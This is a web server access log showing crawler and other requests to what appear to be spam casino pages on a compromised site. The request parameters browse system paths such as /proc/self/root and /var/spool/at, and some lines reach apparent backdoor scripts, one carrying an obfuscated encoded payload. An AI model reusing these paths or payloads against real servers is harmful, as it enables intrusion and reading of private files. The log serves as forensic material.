216.73.216.11 - - [01/Nov/2025:08:46:47 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCardScheme.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.198 - - [01/Nov/2025:08:46:48 -0400] "GET /m245000151?srsltid=AfmBOoURpfZRwjSD6j6Vaq_PI7BwYX9oU_MJweHiN0-M-CdnTuoWpl HTTP/1.1" 200 19064 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:46:48 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/spool/at HTTP/1.1" 200 2541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:41:50 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343531302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303931302q3132303734396466353839343634626463626135353064333132343662303739222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:46:47 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FFile.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.216.227.216 - - [01/Nov/2025:08:46:47 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?path=//opt/alt/ruby18/share/doc HTTP/1.1" 200 3400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:46:48 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCurrency.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:48 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FNotBlankValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FEqualToValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:48 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FGenerator%2FUrlGenerator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FGenerator HTTP/1.1" 200 6370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:49 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FExtension%2FExtension.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FExtension HTTP/1.1" 200 3837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:50 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript HTTP/1.1" 200 4675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:49 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIdenticalTo.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FRegex.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FFalse.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCountValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.226.106.93 - - [01/Nov/2025:08:46:51 -0400] "GET /holiday-home-transformation-at-tiara-residence-palm-jumeirah/?path=//lib/firmware/nvidia/gv100/sec2 HTTP/1.1" 200 3475 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:46:52 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FAllValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FNotEqualTo.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:53 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression%2FExpression.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression HTTP/1.1" 200 3236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
204.12.208.18 - - [01/Nov/2025:08:46:53 -0400] "GET /wp-content/x072d63/index.php HTTP/1.1" 200 26 "http://creativefinishings.com/wp-content/x072d63/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
216.73.216.11 - - [01/Nov/2025:08:46:52 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FValid.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:52 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer%2FCacheWarmerInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer HTTP/1.1" 200 2919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:53 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FTabOptions.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 6556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:54 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FTabGeneral.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 5897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:46:55 -0400] "GET /q-~51tSCesYX2K8UwKEuRXcHRYzD44fbz8b44998/ HTTP/1.1" 200 18383 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:46:53 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping%2FGetterMetadata.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping HTTP/1.1" 200 3111 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:46:55 -0400] "GET /q-~62zAu8XNvgSKFmJxIQ8VkhAVzyM9bmBG15693/ HTTP/1.1" 200 4147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:46:54 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FEmailValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.207.47.227 - - [01/Nov/2025:08:46:56 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//usr/lib64/python3.6/distutils/command HTTP/1.1" 200 4647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:46:57 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-brotli HTTP/1.1" 200 2897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.22.64.232 - - [01/Nov/2025:08:46:59 -0400] "GET /beste-versorger-provision/?fileloc=//usr/include/freetype2/freetype/ftrender.h&path=//usr/include/freetype2/freetype HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:47:02 -0400] "GET /q-~78RP4Wl2IAkYyKtzY4ZOt3kmacT1ghah43421/ HTTP/1.1" 200 18974 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.19.221.48 - - [01/Nov/2025:08:47:03 -0400] "GET /was-auch-immer-via-spielbank-einzahlung-uber-telefonrechnung-land-der-dichter-und-denker/?path=//lib/firmware/xe HTTP/1.1" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [01/Nov/2025:08:47:03 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
216.73.216.11 - - [01/Nov/2025:08:47:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIssnValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLessThan.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLocale.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:05 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2Findex.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FCompiler%2FRepeatedPass.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FCompiler HTTP/1.1" 200 3230 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:47:06 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-profiles-cloudlinux/clshared HTTP/1.1" 200 3139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:47:06 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIban.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:07 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FAll.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:06 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FExistence.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:07 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FTabTemplates.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 6582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:47:09 -0400] "GET /q-~256LirtnbEzgGv8qkCo14FkMPxTaI852z16673/ HTTP/1.1" 200 18387 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:47:07 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper%2FDumperInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper HTTP/1.1" 200 2863 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.188.200.18 - - [01/Nov/2025:08:42:10 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343533302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303933302q3461393366373937353566353162616636313830623864393164616133656530222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:47:07 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIpValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3287 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.196.237.236 - - [01/Nov/2025:08:47:08 -0400] "GET /book-of-ra-magic-kostenlos-spielen-ohne-anmeldung/?path=//proc/self/root/usr/lib/.build-id/2a HTTP/1.1" 200 4903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:47:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLessThanValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FUrl.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FTrue.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCountry.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:10 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FRange.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:12 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping%2FBlackholeMetadataFactory.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
